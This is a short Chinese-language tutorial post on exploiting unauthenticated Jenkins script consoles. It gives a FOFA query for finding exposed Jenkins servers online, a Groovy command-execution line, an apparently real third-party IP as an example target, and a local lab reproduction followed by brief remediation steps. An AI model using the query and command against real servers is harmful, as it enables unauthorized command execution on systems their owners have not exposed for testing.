Jenkins未授权访问漏洞

Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

漏洞复现

步骤一:使用以下fofa语法进行产品搜索

复制代码
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二:在打开的URL中.点击 Manage Jenkins-->Scritp Console 在执行以下命令

复制代码
#执行命令
println "whoami".execute().text  
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

实在找不到

靶场复现

环境准备

虚拟机centos IP:192.168.30.138

下载安装包,版本1.620.1.1.norach

复制代码
wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm

安装Jenkins

复制代码
rpm -ivh jenkins-1.620-1.1.noarch.rpm

启动Jenkins服务

复制代码
service jenkins start

关闭防火墙或放行8080端口

复制代码
systemctl stop firewalld.service

访问服务地址

http://192.168.30.138:8080/manage

http://192.168.30.138:8080/script

复制代码
#执行命令
println "whoami".execute().text  


漏洞修复

  1. 升级版本。
  2. 添加认证,设置强密码复杂度及账号锁定。
  3. 禁止把Jenkins直接暴露在公网。
相关推荐
游戏开发爱好者81 小时前
iOS重构期调试实战:架构升级中的性能与数据保障策略
websocket·网络协议·tcp/ip·http·网络安全·https·udp
安全系统学习3 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
(:满天星:)4 小时前
第31篇:块设备与字符设备管理深度解析(基于OpenEuler 24.03)
linux·运维·服务器·网络·centos
小陶来咯4 小时前
【仿muduo库实现并发服务器】Acceptor模块
运维·服务器
cui_hao_nan4 小时前
Docker后端部署
运维·docker·容器
ZZH1120KQ5 小时前
Linux系统安全及应用
linux·运维·系统安全
小扎仙森5 小时前
关于服务器宝塔转移wordperss子比主题问题
运维·服务器
小小小糖果人6 小时前
Linux云计算基础篇(5)
linux·运维·服务器
我不是哆啦A梦6 小时前
破解风电运维“百模大战”困局,机械版ChatGPT诞生?
运维·人工智能·python·算法·chatgpt
weixin_7714323116 小时前
linux系统 weblogic10.3.6(jar) 下载及安装
linux·运维·jar